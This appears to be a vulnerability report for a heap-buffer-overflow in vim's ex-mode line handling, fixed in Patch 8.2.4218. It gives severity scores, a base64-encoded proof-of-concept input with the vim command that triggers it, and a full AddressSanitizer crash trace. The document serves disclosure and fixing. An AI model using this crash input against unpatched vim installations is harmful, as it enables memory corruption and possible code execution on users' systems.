7.8 High (CVSS3)
Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

6.8 Medium (CVSS2)
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

EPSS: 0.001 (Low), Percentile: 47.7%
Heap-buffer-overflow on write in vim
This issue was created to separate this one and was fixed with Patch 8.2.4218.
Steps to reproduce:
echo -n bm9ybTBRgFBTMP8wMDCysDAwMDAwMDAwMDAwMDAw/zD/g7IwMDAwMDAwMDAwjjAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAD | base64 -d > heap_ow_poc2
vim -u NONE -i NONE -n -X -Z -e -m -s -S heap_ow_poc2 -c :qa!
==1637==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x607000000e66 at pc 0x0000007a6af2 bp 0x7fff3b93fd50 sp 0x7fff3b93fd48
WRITE of size 1 at 0x607000000e66 thread T0
#0 0x7a6af1 in getexmodeline /home/presler/fuzzing/vim_sanitized/src/ex_getln.c:2933:21
#1 0x7371d9 in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:876:46
#2 0x735134 in do_exmode /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c
#3 0xa27ab8 in nv_exmode /home/presler/fuzzing/vim_sanitized/src/normal.c:3423:2
#4 0x9fedf7 in normal_cmd /home/presler/fuzzing/vim_sanitized/src/normal.c:1120:5
#5 0x76d4dc in exec_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c
#6 0x76d33d in exec_normal_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8601:5
#7 0x76cc2a in ex_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8519:6
#8 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
#9 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
#10 0xc751a1 in do_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1512:5
#11 0xc729d8 in cmd_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1098:14
#12 0xc72817 in ex_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1124:2
#13 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
#14 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
#15 0x73af81 in do_cmdline_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:587:12
#16 0x1198eca in exe_commands /home/presler/fuzzing/vim_sanitized/src/main.c:3091:2
#17 0x1196069 in vim_main2 /home/presler/fuzzing/vim_sanitized/src/main.c:774:2
#18 0x118fde6 in main /home/presler/fuzzing/vim_sanitized/src/main.c:426:12
#19 0x7fb0cd8730b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#20 0x41db2d in _start (/home/presler/fuzzing/vim_sanitized/src/vim+0x41db2d)
0x607000000e66 is located 0 bytes to the right of 70-byte region [0x607000000e20,0x607000000e66)
allocated by thread T0 here:
#0 0x496589 in realloc (/home/presler/fuzzing/vim_sanitized/src/vim+0x496589)
#1 0x4c7722 in ga_grow_inner /home/presler/fuzzing/vim_sanitized/src/alloc.c:741:10
#2 0x4c74dd in ga_grow /home/presler/fuzzing/vim_sanitized/src/alloc.c:720:9
#3 0x648655 in bracketed_paste /home/presler/fuzzing/vim_sanitized/src/edit.c:4446:26
#4 0x7a4aee in getexmodeline /home/presler/fuzzing/vim_sanitized/src/ex_getln.c:2874:6
#5 0x7371d9 in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:876:46
#6 0x735134 in do_exmode /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c
#7 0xa27ab8 in nv_exmode /home/presler/fuzzing/vim_sanitized/src/normal.c:3423:2
#8 0x9fedf7 in normal_cmd /home/presler/fuzzing/vim_sanitized/src/normal.c:1120:5
#9 0x76d4dc in exec_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c
#10 0x76d33d in exec_normal_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8601:5
#11 0x76cc2a in ex_normal /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:8519:6
#12 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
#13 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
#14 0xc751a1 in do_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1512:5
#15 0xc729d8 in cmd_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1098:14
#16 0xc72817 in ex_source /home/presler/fuzzing/vim_sanitized/src/scriptfile.c:1124:2
#17 0x740d0e in do_one_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:2573:2
#18 0x73775f in do_cmdline /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:993:17
#19 0x73af81 in do_cmdline_cmd /home/presler/fuzzing/vim_sanitized/src/ex_docmd.c:587:12
#20 0x1198eca in exe_commands /home/presler/fuzzing/vim_sanitized/src/main.c:3091:2
#21 0x1196069 in vim_main2 /home/presler/fuzzing/vim_sanitized/src/main.c:774:2
#22 0x118fde6 in main /home/presler/fuzzing/vim_sanitized/src/main.c:426:12
#23 0x7fb0cd8730b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/presler/fuzzing/vim_sanitized/src/ex_getln.c:2933:21 in getexmodeline
Shadow bytes around the buggy address:
0x0c0e7fff8170: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa 00 00
0x0c0e7fff8180: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
0x0c0e7fff8190: 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 00 00
0x0c0e7fff81a0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c0e7fff81b0: 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 00 01
=>0x0c0e7fff81c0: fa fa fa fa 00 00 00 00 00 00 00 00[06]fa fa fa
0x0c0e7fff81d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff81e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff81f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8210: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==1637==ABORTING
These vulnerabilities are capable of crashing software, modifying memory, and possibly allowing remote execution.